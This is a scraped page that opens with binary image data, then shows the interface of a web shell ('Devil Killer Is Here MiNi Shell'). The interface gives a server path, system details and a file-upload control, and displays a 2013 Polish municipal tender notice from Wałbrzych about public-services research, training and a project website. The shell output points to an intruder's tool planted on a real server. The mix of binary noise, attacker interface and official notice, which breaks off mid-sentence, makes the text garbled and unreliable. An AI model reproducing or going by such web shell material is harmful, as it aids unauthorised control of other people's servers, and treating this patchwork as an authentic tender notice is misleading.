JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130411/142090-N-2013.html

<p class="kh_header"><b>Wałbrzych: Opracowanie dokumentacji i przeprowadzenie szkoleń wraz z utworzeniem strony www w ramach projektu pn.: Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej dofinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013</b><br>
<b>Numer ogłoszenia: 142090 - 2013; data zamieszczenia: 11.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych , Pl. Magistracki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6655153, 6655154, faks 074 6655155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji i przeprowadzenie szkoleń wraz z utworzeniem strony www w ramach projektu pn.: Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej dofinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
Przedmiotem zamówienia jest opracowanie Raportu diagnostyczno-doradczego z rekomendacjami usprawnień  w zakresie jakości i dostępności usług publicznych na obszarze 10 gmin wchodzących w skład Aglomeracji Wałbrzyskiej oraz wdrożenie wyników Raportu poprzez opracowanie systemu pomiaru jakości usług publicznych, przeprowadzenie szkoleń i opracowanie 5 przedwstępnych studiów wykonalności dla przedsięwzięć wskazanych w części diagnostycznej wraz z promocją przeprowadzonych działań na stronie internetowej na potrzeby realizacji projektu pn. Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej dofinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.

Celem zamówienia jest przeprowadzenie działań, które przyczynią się do poprawy efektywności, skuteczności, dostępności i jakości świadczenia usług publicznych na terenie 10 gmin wchodzących w skład Aglomeracji Wałbrzyskiej, tj. Gmina Wałbrzych, Gmina Mieroszów, Gmina Radków, Gmina Nowa Ruda, Gmina Miejska Nowa Ruda, Gmina Szczawno-Zdrój, Gmina Kamienna Góra, Gmina Walim, Gmina Świebodzice, Gmina Jedlina-Zdrój.

Zakres zamówienia obejmuje 4 etapy:

Etap 1 - Diagnoza - Przeprowadzenie działań diagnostycznych w celu opracowania Raportu diagnostyczno-doradczego z rekomendacjami usprawnień  prezentującego diagnozę jakości i dostępności usług publicznych na obszarze gmin: Gmina Wałbrzych, Gmina Mieroszów, Gmina Radków, Gmina Nowa Ruda, Gmina Miejska Nowa Ruda, Gmina Szczawno-Zdrój, Gmina Kamienna Góra, Gmina Walim, Gmina Świebodzice, Gmina Jedlina-Zdrój, w oparciu o odpowiednio dobraną metodologię badań.

Etap 2 - Wdrożenie - Opracowanie systemu pomiaru jakości usług publicznych dotyczących wskazanych w części diagnostycznej obszarów oraz przygotowanie 5 przedwstępnych studiów wykonalności dla przedsięwzięć infrastrukturalnych wskazanych w części diagnostycznej.

Etap 3 - Szkolenia - Przeprowadzenie szkoleń dla pracowników jednostek samorządu terytorialnego z 10 gmin Aglomeracji Wałbrzyskiej oraz szkoleń dla partnerów społeczno - gospodarczych.

Etap 4 - Promocja - Utworzenie strony www dotyczącej realizacji działań w ramach projektu Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej wraz z jej bieżącą aktualizacją i utrzymaniem.

Opis etapu 1
Zadanie należy zrealizować uwzględniając następujące elementy:
a) Przedstawienie koncepcji i metodologii badań jakości usług publicznych świadczonych na terenie 10 gmin Aglomeracji Wałbrzyskiej do akceptacji Zamawiającego,
b) Przeprowadzenie badań fokusowych,
c) Przeprowadzenie badań ilościowych ankietowych,
d) Opracowanie raportu diagnostyczno-doradczego z badań i prezentacja wyników, 
e) Opracowane prezentacji multimedialnej w zakresie przeprowadzonej diagnozy i jej wyników wraz z ich prezentacją Komitetowi Koordynacyjnemu realizacji projektu. 

Założenia i cele badania
Minimalny zakres wniosków wynikających z przeprowadzonej diagnozy to: 
Identyfikacja usług publicznych, które mogą być świadczone wspólnie w sposób bardziej efektywny;
Pogłębiona diagnoza zidentyfikowanych usług publicznych, które mogą być świadczone wspólnie  mająca na celu propozycję działań zaradczych i wdrożeniowych; 
Rekomendacja działań zaradczych w zakresie min.: organizacyjnym, formalno - prawnym, szkoleniowym oraz infrastrukturalnym;
Rekomendacje dotyczące możliwych usprawnień w zakresie współpracy w ramach Aglomeracji Wałbrzyskiej; 
Propozycję projektów w zakresie usług publicznych, które mogą uzyskać dofinansowanie ze środków Funduszy Strukturalnych w okresie 2014 - 2012.
 
Obszary, które zostaną objęte częścią diagnostyczną to co najmniej usługi: edukacyjne i szkoleniowe, ochrony zdrowia, komunikacyjne, gospodarki komunalnej, związane z ochroną środowiska oraz kulturalne.

Celem badań jest zweryfikowanie stanu wiedzy na temat usług publicznych świadczonych dotychczas 
w 10 gminach Aglomeracji Wałbrzyskiej oraz ocena ich efektywności, skuteczności, dostępności i jakości. Wyniki badań powinny przyczynić się  poprawy systemu ich realizacji dla osiągnięcia lepszej efektywności, skuteczności, dostępności oraz jakości. 

Problemy badawcze
Zamawiający wymaga, aby w wyniku prowadzonych działań i badań poruszone zostały poniższe problemy i zagadnienia badawcze:
postrzeganie przez mieszkańców gmin sposobu i trybu świadczenia usług publicznych,
jakość usług - obecnie postrzegana oraz pożądana,
różnice w świadczeniu usług pomiędzy obszarami wiejskimi i miejskimi oraz najlepiej radzącymi sobie i najsłabiej realizującymi usługi,
dostępność usług - obecnej oceniana oraz pożądana, 
świadomość mieszkańców na temat najważniejszych barier dla podnoszenia efektywności usług,
mierniki pomiaru jakości, dostępności, efektywności oraz skuteczności usług,
świadomość istnienia modelowych rozwiązań w zakresie świadczenia usług publicznych do których należy dążyć,
poziom satysfakcji z usług w grupach mieszkańców
postrzeganie roli urzędów gmin w zakresie realizacji usług publicznych w ocenie:
- mieszkańców,
- pracowników urzędów,
- partnerów/podmiotów społeczno - gospodarczych.

Metody i techniki pomiaru 
Wielowymiarowość celów badania oraz wielość zagadnień sugeruje zastosowanie triangulacji metod badań społecznych, bazujących na integracji metod kwantyfikacyjnych z treściowymi (podejście jakościowe i ilościowe).

Profil grup docelowych oraz zakres celów badania w podejściu jakościowym, umożliwi przeprowadzenie analizy statystycznej oraz perspektywy ilościowej pozwalającej na pogłębienie danych i nasycenie merytoryczne mierników. 

Proponuje się zgromadzenie i wykorzystanie co najmniej wymienionych metod:
badań niereaktywnych DR (desk research) danych wtórnych pochodzących ze źródeł zastanych,
badań jakościowych fokusowych FGI (zogniskowanych wywiadów grupowych) wśród mieszkańców, pracowników jst i  partnerów społeczno-gospodarczych,
badań ilościowych: ankietowych technika CATI - wspomaganego komputerowo wywiadu telefonicznego oraz techniki CAPI - wywiady bezpośrednie przy użyciu komputera.
Wykonawca może zaproponować również inne metody badawcze oraz triangulację metod. 

Proponowaną metodykę badań i techniki pomiaru Wykonawca przedstawi wraz z ofertą, na etapie składania oferty i będą one przedmiotem oceny Zamawiającego. 

Operat badawczy i dobór próby badawczej
Badaniem objęci zostaną mieszkańcy gmin: Gmina Wałbrzych, Gmina Mieroszów, Gmina Radków, Gmina Nowa Ruda, Gmina Miejska Nowa Ruda, Gmina Szczawno-Zdrój, Gmina Kamienna Góra, Gmina Walim, Gmina Świebodzice, Gmina Jedlina-Zdrój  w podziale na: 
- mieszkańców obszarów miejskich, 
- mieszkańców obszarów wiejskich. 

W badaniach należy w szczególności uwzględnić miarodajną reprezentację poniżej wskazanych grup (w podziale na partnerów i ogółem):
- cała  populacja mieszkańców obszaru,
- rodziny wielodzietne,
- osoby niepełnosprawne
- osoby powyżej 65 roku życia,
- osoby bezrobotne,
- osoby pracujące (w tym samozatrudnienie).

Badania dotyczyć będą usług zgrupowanych w 2 kategoriach:
Kategoria 1: edukacja i szkolnictwo, ochrona zdrowia, kultura,
Kategoria 2: gospodarka komunalna, ochrona środowiska, komunikacja

Przebieg działań i badań 
W odniesieniu do badań w pierwszej kolejności wymaga się przygotowania szczegółowej koncepcji badań do akceptacji Zamawiającego.

Opis przebiegu działań badawczych wraz ze sposobem doboru i wielkości próby Wykonawca przedstawi  wraz z ofertą, na etapie składania oferty i będą one przedmiotem oceny Zamawiającego. 


Raport diagnostyczno - doradczy  z rekomendacjami usprawnień
Zamawiający zamierza wykorzystać rekomendacje zawarte w raporcie diagnostycznym do podnoszenia jakości, efektywności, skuteczności i dostępności usług publicznych na terenie 10 gmin Aglomeracji Wałbrzyskiej.

Raport diagnostyczno - doradczy z rekomendacjami usprawnień  powinien zawierać co najmniej: 
Spis treści
Streszczenie raportu i kluczowe wnioski w języku niespecjalistycznym
Wprowadzenie
Główne założenia i cele badań
Synteza metodologiczna (w tym: operat badawczy, techniki i metody badawcze, kontrola i zabezpieczenie jakości danych)
Przebieg badań i analiza statystyczna, raport tabelaryczny (w podziale na poszczególne gminy i zbiorcze zestawienia)
Opis wyników badań
Wnioski i rekomendacje działań zaradczych i/lub naprawczych w zakresie: organizacyjnym, formalno-prawnym, szkoleniowym oraz infrastrukturalnym
Rekomendacje obszarów usług publicznych wymagające natychmiastowej interwencji w celu poprawy ich jakości lub dostępności
Propozycje finansowania rozwoju/poprawy usług publicznych ze środków funduszy UE w nowej perspektywie finansowania

Raport diagnostyczno - doradczy z rekomendacjami usprawnień należy dostarczyć w wersji drukowanej, kolorowej - 12 sztuk, i na płycie CD/DVD (pliki: Microsoft Office lub równoważne w formacie edytowalnym).

Wykonawca przedstawi dodatkowo prezentację PowerPoint w wersji elektronicznej, w której w sposób obrazowy i atrakcyjny pokaże wyniki badań. Prezentacja obejmie od 20 do 30 slajdów w PowerPoint i zostanie przedstawiona przedstawicielom gmin przez Wykonawcę w terminie i miejscu uzgodnionym z zamawiającym.

Opis etapu 2
Działanie wdrożeniowe wynikać będzie z wniosków ustalonych w Raporcie diagnostyczno-doradczym z rekomendacjami usprawnień i składać się będzie z dwóch zadań:
1. Opracowanie systemu pomiaru jakości usług publicznych dotyczących wybranych obszarów. Wybór obszarów usług publicznych zostanie wskazany przez Zamawiającego na podstawie wyników Raportu. Podstawowym elementem systemu będzie ustalenie standardów pomiaru i realizacji usług metodami wskaźnikowymi. 
Opracowanie sytemu pomiaru jakości usług publicznych obejmować będzie co najmniej: 
1. Opracowanie wstępnego zestawu standardów usług publicznych opisanych wskaźnikami  monitoringu
2. Przygotowanie dla każdego wskaźnika  monitoringu metryki  zawierającej: 
Opis  wskaźnika
Wskazanie źródeł  dostępności informacji  do wyznaczania wartości  wskaźników, 
Wskazanie częstotliwości pomiaru wskaźnika 
Wskazanie odpowiedzialnych za pozyskiwanie danych i wyznaczanie wartości wskaźników 
3. Uzyskanie akceptacji wskaźników przez Zamawiającego 
4. Opracowanie ostatecznego  zestawu standardów usług publicznych opisanych wskaźnikami  uwzględniającego uwagi wynikające z konsultacji z Zamawiającym. 
5. Zaproponowanie rozwiązania informatycznego usprawniającego wyznaczanie wartości wskaźników wraz ze wskazaniem wymagań technicznych takiego rozwiązania 

System pomiaru jakości usług publicznych należy dostarczyć w wersji drukowanej, kolorowej - 12 sztuk, i na płycie CD/DVD (pliki: Microsoft Office lub równoważne w formacie edytowalnym).

Wykonawca przedstawi dodatkowo prezentację PowerPoint w wersji elektronicznej, w której w sposób obrazowy i atrakcyjny przedstawi opracowany system pomiaru jakości usług publicznych. Prezentacja obejmie od 30 do 40 slajdów w PowerPoint i zostanie zaprezentowana przedstawicielom gmin przez Wykonawcę w terminie i miejscu uzgodnionym z zamawiającym.

2. Przygotowanie 5 sztuk przedwstępnych studiów wykonalności dla przedsięwzięć infrastrukturalnych wskazanych w części diagnostycznej. Ich istotną częścią będzie ocena możliwości współfinansowania projektów infrastr. ze środków UE w nowej perspektywie finansowej.
Ramowa struktura Studium Wykonalności:
I. PRZEDMIOT STUDIUM
1. Geneza i istota projektu. Potencjał i możliwości
2. Nazwa i cel projektu
3. Podmioty odpowiedzialne za realizację przedsięwzięcia: Inwestor, Beneficjent i Operator
II. PODSUMOWANIE I WNIOSKI
1. Wprowadzenie do projektu
2. Koszty przedsięwzięcia
3. Podsumowanie wyników analiz i finansowanie
4. Główne uwarunkowania inwestycji (prawne, administracyjne) wraz zaleceniami i rekomendacjami
III. OTOCZENIE MAKROEKONOMICZNE I TRENDY
1. Potencjał położenia geograficznego
2. Potencjał społeczno-gospodarczy
3. Zidentyfikowane problemy
4. Uwarunkowania społeczno-ekonomiczne realizacji przedsięwzięcia
IV. LOGIKA INTERWENCJI
1. Źródła identyfikacji projektu
2. Cele projektu
4. Analiza SWOT (fakultatywnie)
5. Korzyści i oddziaływanie
6. Rezultaty
7. Produkty
8. Matryca logiczna (LogFrame)
V. ANALIZA RYNKU / ANALIZA SPECYFICZNA (układ treści dostosować do specyfiki branży)
1. Definicja rynku usług
2. Wielkość rynku i jego podział (podaż/popyt)
3. Udział nowego przedsięwzięcia w rynku
4. Odbiorcy usług
5. Konkurencja
6. Analiza popytu bieżącego i przyszłego
VI. ANALIZA INSTYTUCJONALNO-PRAWNA
1. Status prawny beneficjenta
2. Status prawny inwestora
3. Status prawny operatora
4. Powiązania prawno-własnościowe pomiędzy uczestnikami projektu
5. Przygotowania formalno-administracyjne przedsięwzięcia
- Wydane decyzje i zezwolenia administracyjne
- Wymagane decyzje i zezwolenia do wydania i harmonogram ich wydania
6.Trwałość projektu instytucjonalna
VII. ANALIZA TECHNICZNA
1. Opis istniejącego systemu/przedsięwzięcia (stan istniejący)
2. Analiza wariantów
3. Analiza opcji
4. Lokalizacja
5. Opisu projektowanego zakresu przedsięwzięcia
VIII. PLAN WDROŻENIA I FUNKCJONOWANIA PRZEDSIĘWZIĘCIA
1. Struktura organizacyjna wdrażania i eksploatacji
IX. ANALIZA FINANSOWA (ograniczona dla projektów nieprzychodowych)
1. Założenia do analizy finansowej
2. Plan inwestycyjny
3. Źródła finansowanie
4. Prognoza przychodów i kosztów operacyjnych
5. Podsumowanie i wnioski
X. ANALIZA KOSZTÓW I KORZYŚCI SPOŁECZNO-EKONOMICZNYCH
1. Opis i kwantyfikacja efektów społecznych inwestycji - metoda wielokryterialna 
2. Analiza efektywności kosztowej
3. Podsumowanie i wnioski 
XI. ANALIZA RYZYKA I WRAŻLIWOŚCI
1. Analiza ryzyk ekonomiczno-finansowych
2. Analiza ryzyk formalno-instytucjonalnych
3. Analiza ryzyk ekologiczno-technicznych
4. Podsumowanie
XII. OCENA ODZIAŁYWANIA NA ŚRODOWISKO (odniesienie do wymogów prawa
wspólnotowego i krajowego oraz realizacji polityki zrównoważonego rozwoju)
Studia wykonalności należy dostarczyć w wersji drukowanej 3 sztuki i na płycie CD/DVD (pliki: Microsoft Office lub równoważne, Analiza ekonomiczno - finansowa w aktywnym pliku Microsoft Excel lub równoważnym).

Wykonawca przedstawi dodatkowo prezentację PowerPoint w wersji elektronicznej, w której w sposób obrazowy i atrakcyjny przedstawi zakres każdego ze studiów wykonalności wraz ze wskazaniem mocnych i słabych elementów projektów oraz zakresem prac do wykonania w celu złożenia pełnej aplikacji (w tym wykaz brakujących uzgodnień, decyzji, projektów budowlanych itp.). Prezentacja obejmie od 10 do 20 slajdów (na każde Studium) w PowerPoint i zostanie przedstawiona przedstawicielom gmin przez Wykonawcę w terminie i miejscu uzgodnionym z zamawiającym.
Opis etapu 3

1. Szkolenia pracowników jednostek Samorządu Terytorialnego - liczba szkoleń 2; liczba dni szkoleniowych - 6; liczba przeszkolonych osób ogółem - 50; szkolenia zakończone wydaniem certyfikatu udziału w szkoleniu; miejsce prowadzenia szkolenia: teren gmin objętych niniejszym postępowaniem; miejsce szkolenia, program i treść materiałów szkoleniowych muszą zostać zaakceptowane przez Zamawiającego; rekrutację uczestników przeprowadzi Zamawiający. 

Dla powodzenia części wdrożeniowej projektu, niezbędne będzie podniesie poziomu wiedzy reprezentantów jst w zakresie określonym w części diagnostycznej i wdrożeniowej. Zakres szkolenia musi zostać ukierunkowywany na możliwość ciągłego podnoszenia wiedzy o usługach publicznych, jakości ich świadczenia, dostępności oraz osobistego zaangażowania pracowników w ich świadczenie. Obowiązkowym elementem szkoleń będą zagadnienia związane z rozwojem lokalnym w kontekście usług publicznych oraz Funduszy Strukturalnych w perspektywie 2014 - 2020. Wykonawca części szkoleniowej zobowiązany będzie do zapewnienia udziału trenerów dysponujących praktycznym doświadczeniem oraz do organizacji szkoleń w sposób umożliwiający wymianę dobrych praktyk. 


2. Szkolenia partnerów społeczno-gospodarczych - liczba szkoleń 2; liczba dni szkoleniowych  - 3; liczba przeszkolonych osób ogółem - 20; szkolenia zakończone wydaniem certyfikatu udziału w szkoleniu; miejsce prowadzenia szkolenia: teren gmin objętych niniejszym postępowaniem; miejsce szkolenia, program i treść materiałów szkoleniowych muszą zostać zaakceptowane przez Zamawiającego; rekrutację uczestników przeprowadzi Wykonawca szkolenia.

Efektywny udział przedstawicieli partnerów społ. - gosp. w realizacji projektu możliwy będzie wyłącznie 
w sytuacji, w której będą posiadać dobre merytoryczne podstawy do udziału w procesie doradczym w zakresie świadczenia usług publicznych W związku z powyższym zakłada się realizację szkoleń skierowanych do partnerów, których zakres tematyczny, obejmował będzie m.in.: 
1. Regulacje  formalno - prawne mające wpływ na świadczenie usług publicznych,
2. Cele i rodzaje usług publicznych,
3. Wyznaczanie mierników usług, monitorowanie ich realizacji i oceny,
4. Rozwój lokalny,
5. Fundusze Strukturalne  w  perspektywie 2014 - 2020


Wykonawca części szkoleniowej zobowiązany będzie do zapewnienia udziału trenerów dysponujących praktycznym doświadczeniem oraz do organizacji szkoleń w sposób umożliwiający wymianę dobrych praktyk. 

Wykonawca zapewni do przeprowadzenia szkoleń salę wyposażoną w urządzenia i zasoby niezbędne do realizacji przedmiotu zamówienia.

Metoda prowadzenia zajęć: wykładowa, warsztatowa, praca w grupach tematycznych. Dzień szkolenia będzie trwał 6 godzin.

W koszt przeprowadzenia szkolenia należy wliczyć koszt 2 przerw kawowych (kawa, herbata, napoje zimne, ciastka) dziennie.
 
Opis etapu 4

Opracowanie i utworzenie od podstaw strony www  w zakresie realizacji projektu pn. Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej dofinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013,  utrzymanie i  aktualizacja strony www do dnia 31.12.2014r.

Strona WWW będzie głównym i aktualnym źródłem informacji o realizacji projektu oraz jego efektach, a także podstawowym narzędziem prowadzenia szerokich konsultacji społecznych.  

Strona będzie służyć jako platforma wymiany informacji pomiędzy jst. i mieszkańcami Aglomeracji w zakresie usług publicznych. Internet daje możliwości sprawnej wymiany informacji z mieszkańcami Aglomeracji i zarazem lepszego uspołecznienia procesu realizacji projektu oraz efektywnej prezentacji jego wyników. 

Wymagana aktualizacja informacji na stronie, zgodnie z potrzebami Zamawiającego, minimum jeden raz w tygodniu. 

W ramach zamówienia Wykonawca przedstawi Zamawiającemu dwie różniące się od siebie propozycje projektu graficznego strony oraz dwie różniące się od siebie propozycje projektu graficznego aplikacji, z których Zamawiający wybierze po jednym z projektów dla aplikacji i dla strony. Propozycje projektów graficznych powinny znacząco różnić się od siebie. Wykonawca zobowiązuje się do wykonania strony i podstron zgodnie z zaakceptowanym przez Zamawiającego projektem, z uwzględnieniem wytycznych i uwag zgłoszonych przez Zamawiającego.

Przedstawiony projekt powinien uwzględniać specyfikę estetyki właściwej dla stron internetowych urzędów administracji, uwzględniając jednocześnie aspekty korzystania z informacji wyświetlanych na monitorze (kolorystyka, krój czcionki, rozmiar czcionki, ikony itp.). 

Strona będzie zawierała informację o statystyce odwiedzin oraz możliwość prowadzenia konsultacji/ankiet internetowych za pomocą opracowanej aplikacji.

Projekt graficzny oraz oprogramowanie serwisu powinno być oparte na systemie CMS, który daje możliwość samodzielnego zarządzania Witryną, przy czym znajomość technik programowania dla osoby aktualizującej kontent nie jest wymagana. Witryna ma być opracowana tak, aby każda osoba bez znajomości języków HTML, CSS, PHP etc. mogła w sposób bezproblemowy zarządzać całą Witryną.

Strona i aplikacja musi być dostosowana do rozdzielczości 1024x768 w taki sposób, aby na ekranach o tej rozdzielczości nie istniała konieczność przewijania strony w poziomie. Strona i aplikacja ma być wykonana z użyciem technologii HTML, PHP, MySQL i CSS. Strona i aplikacja musi być poprawnie wyświetlana (zgodność z projektem graficznym) i wspierać następujące przeglądarki: - Opera 11 (lub nowszych) - Chrome 14 (lub nowszych) - Mozilla FireFox 12 (lub nowszych) - Internet Explorer 8 (lub nowszych) - Safari 5 (lub nowszych) W przypadku przeglądarek; Internet Explorer 7. Mozilla FireFox 3.6 dopuszczalne są częściowe różnice od wizualnej strony wynikające wyłącznie z braku obsługi niektórych rozwiązań.

Strona musi spełniać:
1. standardy dostępności i spełniać wymagania Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, 
2. minimalne wymagania dla systemów teleinformatycznych wg znowelizowanego art. 18 ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne co wiąże się z zapewnieniem przez system strony wymagań Web Content Accessiblity Guidelines (WCAG v 2.0) na poziomie przynajmniej AA.

Przez cały okres funkcjonowania strony tj. do dnia 31.12.2014r. Wykonawca będzie ponosił wszelkie koszty aktualizacji i utrzymania strony internetowej (utrzymanie serwera wirtualnego www oraz serwera primary i secondary dns dla domeny). Na zakończenie realizacji usługi Wykonawca przekaże Zamawiającemu wszystkie pliki źródłowe, loginy i hasła dostępu umożliwiające zarządzanie stroną.
Wykonawca przed wystawieniem ostatniej faktury okaże Zamawiającemu dokument potwierdzający wykupienie miejsca na serwerze oraz domeny do 31 grudnia 2019 roku. 

Strona internetowa i aplikacja muszą zostać oznakowane zgodnie z Zasadami promocji projektów dla Programu Operacyjnego Pomoc Techniczna 2007-2013..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.10.00.00-3, 79.31.12.00-9, 79.31.50.00-5, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca w wypadku złożenia oferty na zadanie zobowiązany jest do wniesienia wadium przetargowego w wysokości: 7 500,00 zł. najpóźniej do  22.04.2013r. do godz. 10.00
Wadium należy wnieść na konto Urzędu Miejskiego: Bank Handlowy w Warszawie S.A. nr  rach: 92 1030 1289 0000 0000 9000 0152 przelewem z zaznaczeniem: wadium przetargowe na zadanie: 
